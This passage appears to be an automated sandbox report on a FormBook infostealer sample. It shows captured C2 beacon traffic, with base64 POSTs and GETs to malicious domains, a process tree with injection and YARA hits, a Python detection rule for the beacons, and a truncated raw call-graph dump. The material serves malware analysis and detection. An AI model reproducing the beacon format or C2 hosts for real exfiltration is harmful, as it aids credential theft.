Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=()
Expires: 0
Content-Encoding: gzip
Data Raw: (hex dump omitted; chunked body, first chunk size 0x2fd, gzip-compressed)
Data Ascii: (gzip-compressed body, not printable)

Timestamp: Oct 21, 2024 17:28:30.849183083 CEST
Bytes transferred: 106
Direction: IN
Data Raw: (hex dump omitted; remainder of the gzip-compressed body and terminating zero-length chunk)
Data Ascii: (gzip-compressed body, not printable)


Session ID: 55
Source IP: 192.168.2.6
Source Port: 57371
Destination IP: 52.13.151.179
Destination Port: 80

Timestamp: Oct 21, 2024 17:28:32.839207888 CEST
Bytes transferred: 784
Direction: OUT
Data:
POST /t7t4/ HTTP/1.1
Host: www.rudemyvague.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.rudemyvague.info
Referer: http://www.rudemyvague.info/t7t4/
Content-Length: 234
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Raw: (hex dump omitted; decoded body follows)
Data Ascii: qFHlI=EOsfGuNEzgm/WHYB95WSyzZZHP0PusZW8OvWvDK9vwgbGIKmNi/7Dg/Oj/V8C9IdPVQ1Q7I5pmymZIncrNOQMHqcPSit+D2gd+s9HQ8Nr619rp/+QjtUnFVh8uudf3B/l4010RNq08gHwPIliRSx04Byysn4CAd5UVb8aaOFOoGlQiBzJuAcZH47o9QVBmFeQC4csHBmafrzfBq95CHKs5XIoRFtv9xvDA==

Timestamp: Oct 21, 2024 17:28:33.397758961 CEST
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 21 Oct 2024 15:28:33 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=()
Expires: 0
Content-Encoding: gzip
Data Raw: (hex dump omitted; chunked body, first chunk size 0x2fd, gzip-compressed)
Data Ascii: (gzip-compressed body, not printable)

Timestamp: Oct 21, 2024 17:28:33.397772074 CEST
Bytes transferred: 106
Direction: IN
Data Raw: (hex dump omitted; remainder of the gzip-compressed body and terminating zero-length chunk)
Data Ascii: (gzip-compressed body, not printable)


Session ID: 56
Source IP: 192.168.2.6
Source Port: 57372
Destination IP: 52.13.151.179
Destination Port: 80

Timestamp: Oct 21, 2024 17:28:35.377890110 CEST
Bytes transferred: 1797
Direction: OUT
Data:
POST /t7t4/ HTTP/1.1
Host: www.rudemyvague.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.rudemyvague.info
Referer: http://www.rudemyvague.info/t7t4/
Content-Length: 1246
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Raw: (hex dump omitted; truncated in the report)
Data Ascii: qFHlI=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 [TRUNCATED]

Timestamp: Oct 21, 2024 17:28:35.945580006 CEST
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 21 Oct 2024 15:28:35 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=()
Expires: 0
Content-Encoding: gzip
Data Raw: (hex dump omitted; chunked body, first chunk size 0x2fd, gzip-compressed)
Data Ascii: (gzip-compressed body, not printable)

Timestamp: Oct 21, 2024 17:28:35.945635080 CEST
Bytes transferred: 106
Direction: IN
Data Raw: (hex dump omitted; remainder of the gzip-compressed body and terminating zero-length chunk)
Data Ascii: (gzip-compressed body, not printable)


Session ID: 57
Source IP: 192.168.2.6
Source Port: 57373
Destination IP: 52.13.151.179
Destination Port: 80

Timestamp: Oct 21, 2024 17:28:37.922907114 CEST
Bytes transferred: 499
Direction: OUT
Data:
GET /t7t4/?qFHlI=JME/FbwkkQiTLR8EmPe57WZ7VagZp8tJ+vLJvTOCgHppMKWbYWfaRFz4/PgkMvknA1YharU87nKdOM/7k7q3Nku9by2NxiW/BugQGTFPqLFbx4j0WlxBm1BAsaWpX3N32KwZ2Ws=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
Host: www.rudemyvague.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36

Timestamp: Oct 21, 2024 17:28:38.488610983 CEST
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 21 Oct 2024 15:28:38 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=()
Expires: 0
                                                                                                                          Data Raw: 37 36 35 0d 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 70 70 72 65 73 73 69 6f 6e 20 64 65 73 20 64 6f 6e 6e c3 a9 65 73 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 73 74 79 6c 65 3e 0a 0a 62 6f 64 79 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 0a 7d 0a 0a 68 31 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 0a 09 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 3b 0a 7d 0a 0a 2e 62 67 31 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 31 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 32 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 32 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 33 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 [TRUNCATED]
                                                                                                                          Data Ascii: 765<html><head><title>Suppression des donnes</title><style>body{font-family:Arial;font-size:16px;}h1{font-size:20px;text-transform:uppercase;}.bg1{background:url('/site/img/fond1.webp') center top no-repeat;}.bg2{background:url('/site/img/fond2.webp') center top no-repeat;}.bg3{background:url('/site/img/fond3.webp') center top no-repeat;}.bg4{background:url('/site/img/fond4.webp') center top no-repeat;}.bg5{background:url('/site/img/fond5.webp') center top no-repeat;}.bg6{background:url('/site/img/fond6.webp') center top no-repeat;}.bg7{background:url('/site/img/fond7.webp') center top no-repeat;}.bg8{background:url('/site/i
Timestamp:Oct 21, 2024 17:28:38.488630056 CEST
Bytes transferred:1210
Direction:IN
Data Raw: 6d 67 2f 66 6f 6e 64 38 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 39 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 39 2e 77 65
                                                                                                                          Data Ascii: mg/fond8.webp') center top no-repeat;}.bg9{background:url('/site/img/fond9.webp') center top no-repeat;}.bg10{background:url('/site/img/fond10.webp') center top no-repeat;}.bg{background-size: cover;}.zoneText{margin-top:


Session ID:58
Source IP:192.168.2.6
Source Port:57374
Destination IP:103.106.67.112
Destination Port:80
Timestamp:Oct 21, 2024 17:28:51.659837961 CEST
Bytes transferred:757
Direction:OUT
Data:POST /hshp/ HTTP/1.1
                                                                                                                          Host: www.sailforever.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.sailforever.xyz
                                                                                                                          Referer: http://www.sailforever.xyz/hshp/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 47 49 57 37 6f 31 6c 46 39 77 7a 79 7a 69 58 68 61 65 46 61 67 63 4c 4b 30 71 6b 2b 61 54 39 6a 68 38 46 2b 70 39 36 59 4d 6c 72 74 57 74 68 6d 78 32 46 46 5a 74 43 71 36 34 49 6f 56 42 4e 2b 32 44 62 72 6c 71 4e 38 62 6c 49 6f 31 71 68 4c 56 2b 58 47 76 31 4b 47 58 47 75 41 5a 61 6c 6b 4e 2b 31 52 77 51 6a 7a 35 54 6b 4b 44 78 4d 4d 62 6f 53 47 45 50 7a 52 46 35 4d 35 4b 4e 38 48 76 65 34 58 37 44 4d 66 76 51 7a 46 48 6c 61 31 75 33 56 43 69 73 39 72 6d 35 79 76 6f 77 6b 61 77 74 45 39 4c 6c 46 66 32 78 31 4f 62 71 57 54 4f 43 72 34 30 79 70 57 45 34 6f 54 42 75 66 6d
                                                                                                                          Data Ascii: qFHlI=BDKkReVOQWAWGIW7o1lF9wzyziXhaeFagcLK0qk+aT9jh8F+p96YMlrtWthmx2FFZtCq64IoVBN+2DbrlqN8blIo1qhLV+XGv1KGXGuAZalkN+1RwQjz5TkKDxMMboSGEPzRF5M5KN8Hve4X7DMfvQzFHla1u3VCis9rm5yvowkawtE9LlFf2x1ObqWTOCr40ypWE4oTBufm
Timestamp:Oct 21, 2024 17:28:52.252650976 CEST
Bytes transferred:245
Direction:IN
Data:HTTP/1.1 302 Found
                                                                                                                          Location: https://www.sailforever.xyz/hshp/
                                                                                                                          Server: Dynamic Http Server
                                                                                                                          X-Ratelimit-Limit: 101
                                                                                                                          X-Ratelimit-Remaining: 100
                                                                                                                          X-Ratelimit-Reset: 1
                                                                                                                          Date: Mon, 21 Oct 2024 15:28:52 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close


Session ID:59
Source IP:192.168.2.6
Source Port:57375
Destination IP:103.106.67.112
Destination Port:80
Timestamp:Oct 21, 2024 17:28:54.206171036 CEST
Bytes transferred:781
Direction:OUT
Data:POST /hshp/ HTTP/1.1
                                                                                                                          Host: www.sailforever.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.sailforever.xyz
                                                                                                                          Referer: http://www.sailforever.xyz/hshp/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 48 72 65 37 6b 32 39 46 31 77 7a 78 32 69 58 68 54 2b 46 65 67 63 58 4b 30 76 55 75 61 68 70 6a 68 63 56 2b 71 38 36 59 43 46 72 74 43 39 68 5a 2b 57 46 43 5a 74 48 66 36 34 45 6f 56 42 5a 2b 32 42 44 72 6c 64 35 6a 4a 46 49 71 2b 4b 68 56 52 2b 58 47 76 31 4b 47 58 47 72 72 5a 65 78 6b 4e 4e 74 52 78 30 33 77 7a 7a 6b 46 45 78 4d 4d 52 49 53 43 45 50 7a 7a 46 39 4d 54 4b 50 30 48 76 65 49 58 37 53 4d 59 36 41 7a 66 4b 46 61 67 68 6e 45 30 74 75 31 76 6b 4a 79 39 39 58 34 42 78 62 46 6e 58 57 46 38 6b 68 56 4d 62 6f 4f 68 4f 69 72 53 32 79 52 57 57 76 6b 30 4f 61 36 46 4e 41 70 76 46 65 39 79 67 56 53 36 50 37 52 4e 53 33 63 42 67 41 3d 3d
                                                                                                                          Data Ascii: qFHlI=BDKkReVOQWAWHre7k29F1wzx2iXhT+FegcXK0vUuahpjhcV+q86YCFrtC9hZ+WFCZtHf64EoVBZ+2BDrld5jJFIq+KhVR+XGv1KGXGrrZexkNNtRx03wzzkFExMMRISCEPzzF9MTKP0HveIX7SMY6AzfKFaghnE0tu1vkJy99X4BxbFnXWF8khVMboOhOirS2yRWWvk0Oa6FNApvFe9ygVS6P7RNS3cBgA==
Timestamp:Oct 21, 2024 17:28:54.807488918 CEST
Bytes transferred:245
Direction:IN
Data:HTTP/1.1 302 Found
                                                                                                                          Location: https://www.sailforever.xyz/hshp/
                                                                                                                          Server: Dynamic Http Server
                                                                                                                          X-Ratelimit-Limit: 101
                                                                                                                          X-Ratelimit-Remaining: 100
                                                                                                                          X-Ratelimit-Reset: 1
                                                                                                                          Date: Mon, 21 Oct 2024 15:28:54 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
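The three sessions above share the traits that make this traffic recognisable on a proxy or IDS without decrypting anything: plain HTTP on port 80, a path of one 4-character segment, a GET carrying base64 in a short query key followed by a second short key, form-encoded POSTs whose body is a single key=base64 pair, Origin and Referer headers claiming the request comes from the very page it posts to, and an Android tablet User-Agent leaving a Windows host. The 302 to the https URL that answers each POST says nothing about whether the server accepted the data: the 210- and 234-byte bodies have already reached it by the time the redirect is sent. The Python below is an added example written for this page, not Joe Sandbox or Suricata code. The length ranges in its patterns generalise the one sample above and are an assumption; the two benign requests and www.example.com are constructed for contrast; the two-indicator alert threshold is a choice made here.

```python
import re

# Traffic shape of sessions 57-59 in this report: one 4-character path segment;
# a GET whose query is a short key carrying base64 plus a second short key with
# a token (/t7t4/?qFHlI=...&DJ=...); form-encoded POSTs to the same kind of path
# with a single key=base64 body. The length ranges generalise that one sample
# and are an assumption of this example, not a published signature.
PATH_RE = re.compile(r"^/[A-Za-z0-9]{4}/$")
GET_QUERY_RE = re.compile(
    r"^[A-Za-z0-9]{4,6}=[A-Za-z0-9+/=]{40,}&[A-Za-z0-9]{2,3}=[A-Za-z0-9]{8,24}$")
POST_BODY_RE = re.compile(r"^[A-Za-z0-9]{4,6}=[A-Za-z0-9+/=]{40,}$")
# User-Agent reused verbatim by all three sessions: an Android tablet browser,
# out of place for traffic leaving a Windows desktop.
OBSERVED_UA = ("Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) "
               "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36")


def parse_request(raw: str) -> dict:
    """Parse one raw HTTP/1.x request (request line, headers, blank line, body)."""
    head, _, body = raw.replace("\r\n", "\n").strip("\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body.strip()}


def formbook_indicators(req: dict) -> list:
    """Names of the FormBook traffic traits this request exhibits."""
    hits, h = [], req["headers"]
    path, _, query = req["target"].partition("?")
    host = h.get("host", "")
    if h.get("user-agent") == OBSERVED_UA:
        hits.append("android_ua_from_windows_host")
    if req["method"] == "GET" and PATH_RE.match(path) and GET_QUERY_RE.match(query):
        hits.append("get_beacon_shape")
    if (req["method"] == "POST" and PATH_RE.match(path)
            and h.get("content-type", "").startswith("application/x-www-form-urlencoded")
            and POST_BODY_RE.match(req["body"])):
        hits.append("post_beacon_shape")
    # The POSTs claim to originate from the very page they post to, over plain
    # HTTP: a browser form submission faked by the bot.
    if (req["method"] == "POST" and host
            and h.get("origin") == "http://" + host
            and h.get("referer") == "http://" + host + path):
        hits.append("self_referencing_origin")
    return hits


def is_formbook_beacon(req: dict) -> bool:
    """Alert when at least two independent traits coincide (threshold chosen here)."""
    return len(formbook_indicators(req)) >= 2


# Constructed samples: the first two reproduce the request lines and headers of
# sessions 57 and 58 above; the other two are benign requests invented for
# contrast (www.example.com is a reserved example domain).
SAMPLES = {
    "get_beacon": "\n".join([
        "GET /t7t4/?qFHlI=JME/FbwkkQiTLR8EmPe57WZ7VagZp8tJ+vLJvTOCgHppMKWbYWfaRFz4/PgkMvknA1YharU87nKdOM/7k7q3Nku9by2NxiW/BugQGTFPqLFbx4j0WlxBm1BAsaWpX3N32KwZ2Ws=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1",
        "Host: www.rudemyvague.info",
        "User-Agent: " + OBSERVED_UA,
    ]),
    "post_beacon": "\n".join([
        "POST /hshp/ HTTP/1.1",
        "Host: www.sailforever.xyz",
        "Origin: http://www.sailforever.xyz",
        "Referer: http://www.sailforever.xyz/hshp/",
        "Content-Type: application/x-www-form-urlencoded",
        "User-Agent: " + OBSERVED_UA,
        "",
        "qFHlI=BDKkReVOQWAWGIW7o1lF9wzyziXhaeFagcLK0qk+aT9jh8F+p96YMlrtWthmx2FFZtCq64IoVBN+2DbrlqN8blIo1qhLV+XGv1KGXGuAZalkN+1RwQjz5TkKDxMMboSGEPzRF5M5KN8Hve4X7DMfvQzFHla1u3VCis9rm5yvowkawtE9LlFf2x1ObqWTOCr40ypWE4oTBufm",
    ]),
    "benign_get": "\n".join([
        "GET /index.html HTTP/1.1",
        "Host: www.example.com",
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/131.0",
    ]),
    "benign_form_post": "\n".join([
        "POST /login HTTP/1.1",
        "Host: www.example.com",
        "Origin: https://www.example.com",
        "Referer: https://www.example.com/login",
        "Content-Type: application/x-www-form-urlencoded",
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/131.0",
        "",
        "user=alice&password=correct-horse",
    ]),
}


def triage(samples: dict) -> dict:
    """Map each sample name to (verdict, indicator names)."""
    out = {}
    for name, raw in samples.items():
        req = parse_request(raw)
        out[name] = (is_formbook_beacon(req), formbook_indicators(req))
    return out
```

Run stand-alone, triage(SAMPLES) flags the two reproduced requests and clears both benign ones. The User-Agent string is the strongest single trait in this capture and also the cheapest for an operator to change, so the rule is built to stand on the path and body shape alone when it does; the ranges in those patterns should be checked against a larger corpus before they are deployed as anything more than a hunting query.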


                                                                                                                          Target ID:0
                                                                                                                          Start time:11:24:11
                                                                                                                          Start date:21/10/2024
                                                                                                                          Path:C:\Users\user\Desktop\BL.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\BL.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'313'649 bytes
                                                                                                                          MD5 hash:0084FA11E77425FD332E10928312F760
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:2
                                                                                                                          Start time:11:24:12
                                                                                                                          Start date:21/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\BL.exe"
                                                                                                                          Imagebase:0x220000
                                                                                                                          File size:46'504 bytes
                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:3
                                                                                                                          Start time:11:24:22
                                                                                                                          Start date:21/10/2024
                                                                                                                          Path:C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe"
                                                                                                                          Imagebase:0x480000
                                                                                                                          File size:140'800 bytes
                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:4
                                                                                                                          Start time:11:24:24
                                                                                                                          Start date:21/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\SysWOW64\schtasks.exe"
                                                                                                                          Imagebase:0x630000
                                                                                                                          File size:187'904 bytes
                                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:6
                                                                                                                          Start time:11:24:38
                                                                                                                          Start date:21/10/2024
                                                                                                                          Path:C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe"
                                                                                                                          Imagebase:0x480000
                                                                                                                          File size:140'800 bytes
                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

Target ID: 9
Start time: 11:24:54
Start date: 21/10/2024
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase: 0x7ff728280000
File size: 676'768 bytes
MD5 hash: C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 3%
Dynamic/Decrypted Code Coverage: 1.3%
Signature Coverage: 4.7%
Total number of Nodes: 1434
Total number of Limit Nodes: 37

[Execution graph: interactive node/edge rendering of the sample's call graph (function addresses, API calls and CRT routines); raw graph data not reproduced here.]
4152fa 86004->86006 86007 41453a __fileno 67 API calls 86005->86007 86059 417f23 67 API calls __getptd_noexit 86006->86059 86009 415320 86007->86009 86012 41efd4 __locking 71 API calls 86009->86012 86010 4152ff 86060 417ebb 6 API calls 2 library calls 86010->86060 86014 415335 86012->86014 86013 41530f 86013->85993 86014->86013 86015 4153a9 86014->86015 86017 415364 86014->86017 86061 417f23 67 API calls __getptd_noexit 86015->86061 86017->86013 86018 41efd4 __locking 71 API calls 86017->86018 86019 415404 86018->86019 86019->86013 86020 41efd4 __locking 71 API calls 86019->86020 86020->86013 86022 4148a7 86021->86022 86023 414885 86021->86023 86027 41453a 86022->86027 86023->86022 86024 41453a __fileno 67 API calls 86023->86024 86025 4148a0 86024->86025 86062 41c3cf 101 API calls 5 library calls 86025->86062 86028 41455e 86027->86028 86029 414549 86027->86029 86033 41efd4 86028->86033 86063 417f23 67 API calls __getptd_noexit 86029->86063 86031 41454e 86064 417ebb 6 API calls 2 library calls 86031->86064 86034 41efe0 __wfsopen 86033->86034 86035 41f003 86034->86035 86036 41efe8 86034->86036 86037 41f011 86035->86037 86042 41f052 86035->86042 86085 417f36 67 API calls __getptd_noexit 86036->86085 86087 417f36 67 API calls __getptd_noexit 86037->86087 86040 41efed 86086 417f23 67 API calls __getptd_noexit 86040->86086 86041 41f016 86088 417f23 67 API calls __getptd_noexit 86041->86088 86065 41ba3b 86042->86065 86046 41eff5 __wfsopen 86046->85994 86047 41f01d 86089 417ebb 6 API calls 2 library calls 86047->86089 86048 41f058 86050 41f065 86048->86050 86051 41f07b 86048->86051 86075 41ef5f 86050->86075 86090 417f23 67 API calls __getptd_noexit 86051->86090 86054 41f080 86091 417f36 67 API calls __getptd_noexit 86054->86091 86055 41f073 86092 41f0a6 LeaveCriticalSection __unlock_fhandle 86055->86092 86058->85994 86059->86010 86061->86013 86062->86022 86063->86031 86066 